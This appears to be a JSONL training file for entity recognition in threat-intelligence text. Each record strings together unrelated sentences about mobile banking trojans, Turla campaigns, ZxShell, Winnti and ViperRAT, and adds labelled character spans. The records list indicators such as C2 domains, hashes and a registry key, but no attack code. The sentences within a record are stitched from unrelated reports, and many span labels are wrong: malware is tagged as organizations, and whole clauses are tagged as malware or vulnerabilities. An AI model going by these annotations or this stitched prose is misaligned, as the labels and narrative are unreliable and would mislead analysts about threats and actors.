{"text": "It helps the attacker find out which banks the owner of the smartphone calls \u2013 the Trojan receives a list of bank phone numbers from its C & C server . The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case . Winnti : hpqhvind.exe . The configuration contains two C2 servers that are prefixed with a protocol identifier .", "spans": [{"start": 250, "end": 268, "label": "Organization"}, {"start": 304, "end": 311, "label": "System"}, {"start": 455, "end": 461, "label": "Organization"}, {"start": 464, "end": 476, "label": "Indicator"}, {"start": 510, "end": 520, "label": "System"}]}
{"text": "It steals money from the victim \u2019 s bank account . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target . Winnti : hpqhvsei.dll . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 163, "end": 169, "label": "Organization"}, {"start": 172, "end": 184, "label": "Indicator"}, {"start": 206, "end": 223, "label": "Organization"}, {"start": 235, "end": 246, "label": "Organization"}, {"start": 247, "end": 333, "label": "Vulnerability"}]}
{"text": "In Russia , some major banks offer their clients a special service that allows them to transfer money from their bank card to their mobile phone account . Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar . Winnti : oci.dll . ThreatConnect collects realtime intelligence from the CISA Known Exploited Vulnerabilities Catalog and Google Project Zero , as well as other feeds and sources , enriching it with insights from sources such as the National Vulnerability Database NVD and the global ThreatConnect community .", "spans": [{"start": 201, "end": 206, "label": "System"}, {"start": 230, "end": 239, "label": "System"}, {"start": 252, "end": 257, "label": "Organization"}, {"start": 272, "end": 278, "label": "Organization"}, {"start": 283, "end": 289, "label": "Organization"}, {"start": 292, "end": 298, "label": "Organization"}, {"start": 301, "end": 308, "label": "Indicator"}, {"start": 311, "end": 324, "label": "Organization"}, {"start": 365, "end": 409, "label": "Organization"}, {"start": 414, "end": 433, "label": "Organization"}, {"start": 525, "end": 564, "label": "Organization"}, {"start": 576, "end": 599, "label": "Organization"}]}
{"text": "Customers have to send a set text message from their phone to a specific bank number . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated . Winnti : C&C : b[org_name].dnslookup.services : 443 . Organizations can collect this intelligence , review the threats described , consider if and how the threat is relevant to them , and the necessity of making any potential additional mitigations .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 162, "end": 167, "label": "System"}, {"start": 200, "end": 206, "label": "Organization"}, {"start": 209, "end": 212, "label": "System"}, {"start": 215, "end": 245, "label": "Indicator"}, {"start": 254, "end": 267, "label": "Organization"}]}
{"text": "Svpeng sends the corresponding messages to the SMS services of two banks . Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions . Winnti : C&C : w[org_name].livehost.live : 443 . The ISO file contained at least the following :", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 75, "end": 90, "label": "Organization"}, {"start": 267, "end": 273, "label": "Organization"}, {"start": 276, "end": 279, "label": "System"}, {"start": 282, "end": 307, "label": "Indicator"}, {"start": 320, "end": 328, "label": "System"}]}
{"text": "Svpeng does this to check if the cards from these banks are attached to the number of the infected phone and to find out the account balance . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions . Winnti : C&C : w[org_name].dnslookup.services : 443 . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 164, "end": 174, "label": "System"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 279, "end": 285, "label": "Organization"}, {"start": 288, "end": 291, "label": "System"}, {"start": 294, "end": 324, "label": "Indicator"}, {"start": 394, "end": 611, "label": "Malware"}]}
{"text": "If the phone is attached to a bank card , commands are sent from the C & C server with instructions to transfer money from the user \u2019 s bank account to his/her mobile account . Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file . Middle Eastern hacking group is using FinFisher malware to conduct international espionage . Looking at the motivations of hackers and cybercriminals is just one possible way to look at how we can dictate our cybersecurity priorities .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 195, "end": 214, "label": "System"}, {"start": 350, "end": 359, "label": "Malware"}, {"start": 435, "end": 442, "label": "Organization"}, {"start": 447, "end": 461, "label": "Organization"}]}
{"text": "The cybercriminals then send this money to a digital wallet or to a premium number and cash it in . Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" . Recently , there was a blog post on the takedown of a botnet used by threat actor group known as Group 72 and their involvement in Operation SMN . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": [{"start": 126, "end": 139, "label": "Organization"}, {"start": 218, "end": 228, "label": "System"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 399, "end": 407, "label": "Organization"}, {"start": 423, "end": 428, "label": "Malware"}, {"start": 611, "end": 620, "label": "Malware"}]}
{"text": "It steals logins and passwords to online banking accounts by substituting he window displayed by the bank application . We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks . This group is sophisticated , well funded , and exclusively targets high profile organizations with high value intellectual property in the manufacturing , industrial , aerospace , defense , and media sector . None PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user - supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 190, "end": 208, "label": "Organization"}, {"start": 483, "end": 489, "label": "System"}, {"start": 495, "end": 510, "label": "System"}, {"start": 522, "end": 528, "label": "System"}, {"start": 547, "end": 558, "label": "System"}, {"start": 617, "end": 629, "label": "System"}, {"start": 683, "end": 686, "label": "System"}]}
{"text": "Currently , this only affects Russian banks , but the technology behind Svpeng could easily be used to target other banking applications . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies . The primary attack vectors are watering-hole , spear phishing , and other web-based attacks . KillMilk continues to be a central coordinator for the KillNet Collective , despite claims of leaving the group in mid-2022 .", "spans": [{"start": 72, "end": 78, "label": "Malware"}, {"start": 160, "end": 170, "label": "System"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 355, "end": 363, "label": "Organization"}]}
{"text": "It steals bank card information ( the number , the expiry date , CVC2/CVV2 ) imitating the process of registering the bank card with Google Play . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military . Frequently , a remote administration tool ( RAT ) is used to maintain persistence within a victim \u2019s organization . Copies of the site at archive.org show it was the work of someone calling themselves \u201c The Chaos Creator . \u201d", "spans": [{"start": 133, "end": 144, "label": "System"}, {"start": 168, "end": 178, "label": "System"}, {"start": 257, "end": 265, "label": "Organization"}, {"start": 283, "end": 309, "label": "System"}, {"start": 312, "end": 315, "label": "System"}, {"start": 471, "end": 488, "label": "Organization"}]}
{"text": "If the user has launched Play Market , the Trojan intercepts the event and displays a window on top of the Google Play window , prompting the user to enter his/her bank card details in the fake window . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education . These tools are used to further compromise the organization by attacking other hosts inside the targets network . Furthermore , these reports indicated that Zarya was cooperating with or being handled by officers of Russia \u2019s Federal Security Service ( FSB ) .", "spans": [{"start": 25, "end": 36, "label": "System"}, {"start": 107, "end": 118, "label": "System"}, {"start": 224, "end": 234, "label": "System"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 541, "end": 583, "label": "Organization"}]}
{"text": "The data entered by the user is sent to the cybercriminals . When G-Data published on Turla/Uroburos back in February , several questions remained unanswered . ZxShell ( aka Sensocode ) is a Remote Administration Tool ( RAT ) used by Group 72 to conduct cyber-espionage operations . If we look at our previous cyberattack incident , a spear phishing attack likely left indications of malicious browser redirects and malware installation attempts .", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 86, "end": 100, "label": "Organization"}, {"start": 160, "end": 167, "label": "Malware"}, {"start": 174, "end": 183, "label": "Malware"}, {"start": 191, "end": 217, "label": "System"}, {"start": 220, "end": 223, "label": "System"}, {"start": 234, "end": 242, "label": "Organization"}, {"start": 369, "end": 445, "label": "Indicator"}]}
{"text": "mobile_treats_2013_06s It extorts money from users by threatening to block the smartphone : it displays a message demanding $ 500 to unblock the device . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies . Once the RAT is installed on the host it will be used to administer the client , exfiltrate data , or leverage the client as a pivot to attack an organization \u2019s internal infrastructure . The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": [{"start": 175, "end": 185, "label": "System"}, {"start": 277, "end": 301, "label": "Organization"}, {"start": 313, "end": 316, "label": "System"}, {"start": 612, "end": 672, "label": "Organization"}]}
{"text": "In actual fact , the Trojan does not block anything and the phone can be used without any problems . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" . Here is a short list of the types of tools included with ZxShell : A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": [{"start": 166, "end": 177, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 201, "end": 207, "label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}, {"start": 283, "end": 290, "label": "Malware"}, {"start": 345, "end": 352, "label": "Organization"}]}
{"text": "It hides traces of its activity by masking the outgoing and incoming text messages and blocking calls and messages from numbers belonging to the bank . Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia . Keylogger ( used to capture passwords and other interesting data ) . By looking at the most likely perpetrators , we can ask who would be motivated to come after the company , what are the tactics , techniques and procedures and priorities , and what defenses are needed .", "spans": [{"start": 225, "end": 239, "label": "Organization"}, {"start": 242, "end": 260, "label": "Organization"}, {"start": 267, "end": 282, "label": "Organization"}, {"start": 332, "end": 341, "label": "System"}, {"start": 431, "end": 443, "label": "Organization"}]}
{"text": "The Trojan gets the list of bank phone numbers from its C & C server . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) . Command line shell for remote administration . These groups can steal information and argue that they are practicing free speech , but more often than not , these groups will employ a DDoS Distributed Denial of Service attack to overload a website with too much traffic and cause it to crash .", "spans": [{"start": 128, "end": 133, "label": "Organization"}, {"start": 137, "end": 145, "label": "Organization"}, {"start": 150, "end": 168, "label": "System"}, {"start": 203, "end": 209, "label": "Organization"}]}
{"text": "It protects itself from deletion by requesting Device Administrator rights during the installation . The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims . Remote desktop . Organizations can validate their security controls using the following actions with Mandiant Security Validation .", "spans": [{"start": 138, "end": 141, "label": "System"}, {"start": 218, "end": 232, "label": "System"}]}
{"text": "As a result , the Trojan delete button in the list of applications becomes inactive , which may cause problems for inexperienced users . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Various network attack tools used to fingerprint and compromise other hosts on the network . The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec .", "spans": [{"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 194, "end": 205, "label": "Vulnerability"}, {"start": 231, "end": 259, "label": "System"}, {"start": 359, "end": 372, "label": "System"}, {"start": 439, "end": 445, "label": "System"}]}
{"text": "It is impossible to deprive it of these rights without the use of specialized tools ( such as Kaspersky Internet Security for Android ) . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim . Local user account creation tools . /Library / Ruby / Gems/2.6.0 / extensions / init.rb Ruby script 53789519 /usr / local / bin / com.docker.vmnat FULLHOUSE.DOORED 53789522 /usr / local / bin / com.docker.vmnat.lock Not recovered 54101444 /Library / Fonts / ArialUnicode.ttf.md5 STRATOFEAR ( Config ) 54102142", "spans": [{"start": 94, "end": 121, "label": "System"}, {"start": 126, "end": 133, "label": "System"}, {"start": 215, "end": 228, "label": "System"}, {"start": 290, "end": 323, "label": "System"}, {"start": 378, "end": 505, "label": "Indicator"}]}
{"text": "To protect itself from being removed , Svpeng uses a previously unknown vulnerability in Android . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla . For a complete list of tools please see the MainConnectionIo section . Minidionis \u2013 one more APT with a usage of cloud drives \u2022 Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": [{"start": 39, "end": 45, "label": "Malware"}, {"start": 89, "end": 96, "label": "System"}, {"start": 188, "end": 198, "label": "System"}, {"start": 272, "end": 282, "label": "Organization"}, {"start": 329, "end": 337, "label": "Organization"}, {"start": 348, "end": 362, "label": "Organization"}, {"start": 371, "end": 384, "label": "Organization"}, {"start": 404, "end": 412, "label": "Malware"}, {"start": 443, "end": 477, "label": "System"}]}
{"text": "It uses the same trick to prevent the smartphone from being returned to its factory settings . this attack against a Kaspersky Lab user on August 5 , 2014 . The following paper is a technical analysis on the functionality of ZxShell . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": [{"start": 117, "end": 130, "label": "Organization"}, {"start": 225, "end": 232, "label": "Malware"}]}
{"text": "The Trojan is distributed in Russia and CIS countries . VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 . The analysts involved were able to identify command and control ( C2 ) servers , dropper and installation methods , means of persistence , and identify the attack tools that are core to the RAT \u2019s purpose . The VPNs used by RGB actors occasionally fail , which reveals the IP addresses of the actor 's true origins .", "spans": [{"start": 56, "end": 69, "label": "Organization"}, {"start": 195, "end": 214, "label": "System"}, {"start": 217, "end": 219, "label": "System"}, {"start": 341, "end": 344, "label": "System"}, {"start": 358, "end": 366, "label": "System"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 420, "end": 436, "label": "System"}]}
{"text": "But , as we have already mentioned , the criminals could easily turn their attention to users in other countries . Venomous Bear has deployed malware to targets using several novel methods . In addition , the researchers used their analysis to provide detection coverage for Snort , Fireamp , and ClamAV . In July 2023 , Mandiant Consulting responded to a supply chain compromise affecting a US - based software solutions entity .", "spans": [{"start": 115, "end": 128, "label": "Organization"}, {"start": 275, "end": 280, "label": "System"}, {"start": 283, "end": 290, "label": "System"}, {"start": 297, "end": 303, "label": "System"}, {"start": 321, "end": 340, "label": "Organization"}, {"start": 356, "end": 379, "label": "Organization"}, {"start": 390, "end": 428, "label": "Organization"}]}
{"text": "Perkele and Wroba Foreign users have also been on the receiving end of several malicious innovations targeting bank accounts . For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims . ZxShell has been around since 2004 . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 12, "end": 17, "label": "Malware"}, {"start": 139, "end": 144, "label": "Organization"}, {"start": 190, "end": 211, "label": "System"}, {"start": 236, "end": 243, "label": "Malware"}]}
{"text": "The Perkele Android Trojan not only attacks Russian users but also clients of several European banks . Turla merely uses the Adobe brand to trick users into downloading the malware . There are a lot of versions available in the underground market . Evernote is a popular app in the healthcare community for data sharing files , notes , schedules , etc . across phones and other devices .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 249, "end": 257, "label": "System"}, {"start": 282, "end": 302, "label": "Organization"}]}
{"text": "It is of interest primarily because it operates in conjunction with various banking win32-Trojans . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 . We have analyzed the most common version of ZxShell , version 3.10 . None The Foudre string no longer present The window used for keylogging was originally named Foudre giving the malware its name , but has now been renamed to form1 to help the malware evade signaturebased detection", "spans": [{"start": 84, "end": 97, "label": "System"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 293, "end": 300, "label": "Malware"}, {"start": 327, "end": 340, "label": "Indicator"}, {"start": 359, "end": 532, "label": "Indicator"}]}
{"text": "Its main task is to bypass the two-factor authentication of the client in the online banking system . Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations . There are newer versions , up to version 3.39 as of October 2014 . An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to \u201c all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . \u201d", "spans": [{"start": 299, "end": 442, "label": "Malware"}]}
{"text": "Due to the specific nature of its activity , Perkele is distributed in a rather unusual way . Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer . An individual who goes by the name LZX in some online forums is believed to be the original author of ZxShell . Supply Chain Attack", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 167, "end": 174, "label": "System"}, {"start": 183, "end": 189, "label": "System"}, {"start": 193, "end": 198, "label": "System"}, {"start": 303, "end": 310, "label": "Malware"}, {"start": 313, "end": 332, "label": "Organization"}]}
{"text": "When a user enters an Internet banking site on a computer infected by banking malware ( ZeuS , Citadel ) , a request about the smartphone number and type of operating system is injected into the code of the authentication page . Kaspersky Lab documented this behavior in 2014 . Since ZxShell has been around since at least 2004 , numerous people have purchased or obtained the tools necessary to set up ZxShell command and control servers ( C&C ) and generate the malware that is placed on the victim \u2019s network . The RAT was likely not detected before as it has the ability to remove itself from the victim machine in time for the deployment of malware .", "spans": [{"start": 88, "end": 92, "label": "Malware"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 284, "end": 291, "label": "Malware"}, {"start": 403, "end": 410, "label": "Malware"}, {"start": 411, "end": 430, "label": "System"}, {"start": 441, "end": 444, "label": "System"}]}
{"text": "This data is immediately sent to the cybercriminals and the computer displays the QR code containing a link to the alleged certificate of the online banking system . It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors . ZxShell has been observed to be distributed through phishing attacks , dropped by exploits that leverage vulnerabilities such as CVE-2011-2462 , CVE-2013-3163 , and CVE-2014-0322 . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": [{"start": 210, "end": 231, "label": "System"}, {"start": 293, "end": 300, "label": "Malware"}, {"start": 422, "end": 435, "label": "Vulnerability"}, {"start": 438, "end": 451, "label": "Vulnerability"}, {"start": 458, "end": 471, "label": "Vulnerability"}, {"start": 489, "end": 500, "label": "Organization"}, {"start": 584, "end": 600, "label": "Vulnerability"}]}
{"text": "After scanning the QR code and installing a component downloaded from the link , the user infects his smartphone with the Trojan program that boasts functionality that is of great interest to the attackers . Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack . To illustrate the functionality of main ZxShell module , Let \u2019s take a look at the following sample : \u201c So good luck , I \u2019m sure we \u2019ll talk again soon , but for now , I ve got better things in the oven , \u201d Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated .", "spans": [{"start": 383, "end": 390, "label": "Malware"}, {"start": 550, "end": 558, "label": "Organization"}, {"start": 568, "end": 576, "label": "Organization"}, {"start": 612, "end": 626, "label": "Organization"}]}
{"text": "Perkele intercepts mTANs ( confirmation codes for banking operations ) sent by the bank via text message . Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito . MD5 : e3878d541d17b156b7ca447eeb49d96a . Minidionis \u2013 one more APT with a usage of cloud drives \u2022 Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 210, "end": 242, "label": "Indicator"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 302, "end": 310, "label": "Organization"}, {"start": 321, "end": 335, "label": "Organization"}, {"start": 344, "end": 357, "label": "Organization"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 416, "end": 450, "label": "System"}]}
{"text": "By using the login and password stolen from the browser , the Windows Trojan initiates a fake transaction while Perkele intercepts ( via the C & C server ) the mTAN sent by the bank to the user . It is not the first time Turla has used generic tools . SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c . Harrison even went after Bradshaw \u2019s lawyer and wife , listing them both on a website he created called Contact - a - CEO[.]com , which Harrison used to besmirch the name of major companies \u2014 including several past employers \u2014 all entities he believed had slighted him or his family in some way .", "spans": [{"start": 112, "end": 119, "label": "Malware"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 236, "end": 249, "label": "System"}, {"start": 261, "end": 325, "label": "Indicator"}, {"start": 328, "end": 336, "label": "Organization"}, {"start": 353, "end": 380, "label": "Organization"}]}
{"text": "Money then disappears from the victim \u2019 s account and is cashed in without the owner \u2019 s knowledge . In the past , we have seen the group using open-source password dumpers such as Mimikatz . It exports the following functions , which are examined in greater detail below : DllMain Install UnInstall ServiceMain ShellMain ShellMainThread zxFunction001 zxFunction002 . An attacker with access to a valid cookie can establish an authenticated session to the NetScaler appliance without knowledge of the username , password , or access to a multi - factor authentication token or device .", "spans": [{"start": 144, "end": 172, "label": "System"}, {"start": 181, "end": 189, "label": "System"}, {"start": 368, "end": 379, "label": "Organization"}]}
{"text": "The Korean malware Wroba , in addition to the traditional vector of infection via file-sharing services , spreads via alternative app stores . Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor . DllMain performs the initialization of ZxShell . Get Ready for Ransomware in 2023 with the ThreatConnect Platform", "spans": [{"start": 19, "end": 24, "label": "Malware"}, {"start": 275, "end": 285, "label": "System"}, {"start": 372, "end": 379, "label": "Malware"}]}
{"text": "Once it infects a device , Wroba behaves very aggressively . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure . It allocates a buffer of 0x2800 bytes and copies the code for the ZxGetLibAndProcAddr function . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 27, "end": 32, "label": "Malware"}, {"start": 117, "end": 131, "label": "Malware"}, {"start": 376, "end": 536, "label": "Malware"}]}
{"text": "It searches for mobile banking applications , removes them and uploads counterfeit versions . However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper . To copy memory , the memcpy function is invoked . The code hunted for several security products to evade \u2013 including Kaspersky .", "spans": [{"start": 161, "end": 171, "label": "System"}, {"start": 251, "end": 258, "label": "System"}, {"start": 339, "end": 356, "label": "Organization"}, {"start": 378, "end": 387, "label": "Organization"}]}
{"text": "From the outside , they are indistinguishable from the legitimate applications . Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version . It is not directly used from msvcrt.dll but is instead copied to another memory chunk before being called . They claim to have compromised the company and are willing to help resolve the issue .", "spans": [{"start": 291, "end": 301, "label": "Indicator"}, {"start": 389, "end": 454, "label": "Malware"}]}
{"text": "However , they possess no banking functions , and merely steal the logins and passwords entered by users . At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign . Finally , the trojan Import Address Table ( IAT ) is resolved and the file path of the process that hosts the DLL is resolved and saved in a global variable . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 263, "end": 269, "label": "Malware"}, {"start": 270, "end": 290, "label": "System"}, {"start": 293, "end": 296, "label": "System"}, {"start": 359, "end": 362, "label": "System"}, {"start": 465, "end": 476, "label": "Malware"}, {"start": 481, "end": 495, "label": "Malware"}]}
{"text": "ViperRAT : The Mobile APT Targeting The Israeli Defense Force That Should Be On Your Radar February 16 , 2017 ViperRAT is an active , advanced persistent threat ( APT ) that sophisticated threat actors are actively using to target and spy on the Israeli Defense Force.The threat actors behind the ViperRAT surveillanceware collect a significant amount of sensitive information off of the device , and seem most interested in exfiltrating images and audio content . In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months . ZxShell.dll is injected in a shared SVCHOST process . If an IOC is malicious and the file available to us , Symantec Endpoint products will detect and block that file .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 40, "end": 61, "label": "Organization"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 246, "end": 271, "label": "Organization"}, {"start": 297, "end": 305, "label": "Malware"}, {"start": 571, "end": 582, "label": "Indicator"}, {"start": 607, "end": 614, "label": "System"}, {"start": 631, "end": 634, "label": "Indicator"}, {"start": 679, "end": 705, "label": "System"}]}
{"text": "The attackers are also hijacking the device camera to take pictures . Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors . The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service . The findings , compiled together in the 2023 State of Ransomware Report , show alarming trends in the global ransomware surge from July 2022 to June 2023 .", "spans": [{"start": 116, "end": 126, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 141, "end": 144, "label": "Organization"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 157, "end": 167, "label": "Organization"}, {"start": 172, "end": 189, "label": "Organization"}, {"start": 196, "end": 203, "label": "System"}, {"start": 223, "end": 254, "label": "System"}, {"start": 299, "end": 305, "label": "System"}, {"start": 407, "end": 442, "label": "Organization"}]}
{"text": "Using data collected from the Lookout global sensor network , the Lookout research team was able to gain unique visibility into the ViperRAT malware , including 11 new , unreported applications . Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer . Before the malware can be installed a unique name must to be generated for the service . But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": [{"start": 30, "end": 37, "label": "Organization"}, {"start": 132, "end": 140, "label": "Malware"}, {"start": 327, "end": 357, "label": "System"}, {"start": 543, "end": 551, "label": "Organization"}, {"start": 597, "end": 606, "label": "Organization"}, {"start": 622, "end": 644, "label": "Organization"}]}
{"text": "We also discovered and analyzed live , misconfigured malicious command and control servers ( C2 ) , from which we were able to identify how the attacker gets new , infected apps to secretly install and the types of activities they are monitoring . The Turla espionage group has been targeting various institutions for many years . The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost . Given Sandworm 's global threat activity and the worldwide deployment of MicroSCADA products , asset owners globally should take action to mitigate their tactics , techniques , and procedures against IT and OT systems .", "spans": [{"start": 382, "end": 388, "label": "System"}, {"start": 421, "end": 428, "label": "System"}, {"start": 457, "end": 488, "label": "System"}, {"start": 523, "end": 557, "label": "Organization"}, {"start": 590, "end": 600, "label": "System"}, {"start": 612, "end": 624, "label": "Organization"}, {"start": 717, "end": 734, "label": "System"}]}
{"text": "In addition , we uncovered the IMEIs of the targeted individuals ( IMEIs will not be shared publicly for the privacy and safety of the victims ) as well as the types of exfiltrated content . Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal . At startup , Svchost.exe checks the services part of the registry and constructs a list of services to load . At the end of There is a call to the main function of the malware that contains all its functionality .", "spans": [{"start": 235, "end": 241, "label": "System"}, {"start": 310, "end": 321, "label": "Indicator"}, {"start": 432, "end": 508, "label": "Malware"}]}
{"text": "In aggregate , the type of information stolen could let an attacker know where a person is , with whom they are associated ( including contacts \u2019 profile photos ) , the messages they are sending , the websites they visit and search history , screenshots that reveal data from other apps on the device , the conversations they have in the presence of the device , and a myriad of images including anything at which device \u2019 s camera is pointed . The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon . Each Svchost session can contain multiple shared services that are organized in groups . Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": [{"start": 618, "end": 624, "label": "System"}, {"start": 632, "end": 639, "label": "System"}]}
{"text": "Lookout has determined ViperRAT is a very sophisticated threat that adds to the mounting evidence that targeted mobile attacks against governments and business is a real problem . Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 . Therefore , separate services can run , depending on how and where Svchost.exe is started . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 23, "end": 31, "label": "Malware"}, {"start": 180, "end": 229, "label": "Organization"}, {"start": 351, "end": 362, "label": "Indicator"}, {"start": 462, "end": 513, "label": "Vulnerability"}]}
{"text": "Lookout researchers have been tracking this threat for the last month . Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure . Svchost.exe groups are identified in the above registry key . Fortunately , an artifact of its execution was discovered in the /private / var / db / oah directory .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 103, "end": 112, "label": "System"}, {"start": 227, "end": 238, "label": "Indicator"}, {"start": 303, "end": 389, "label": "Indicator"}]}
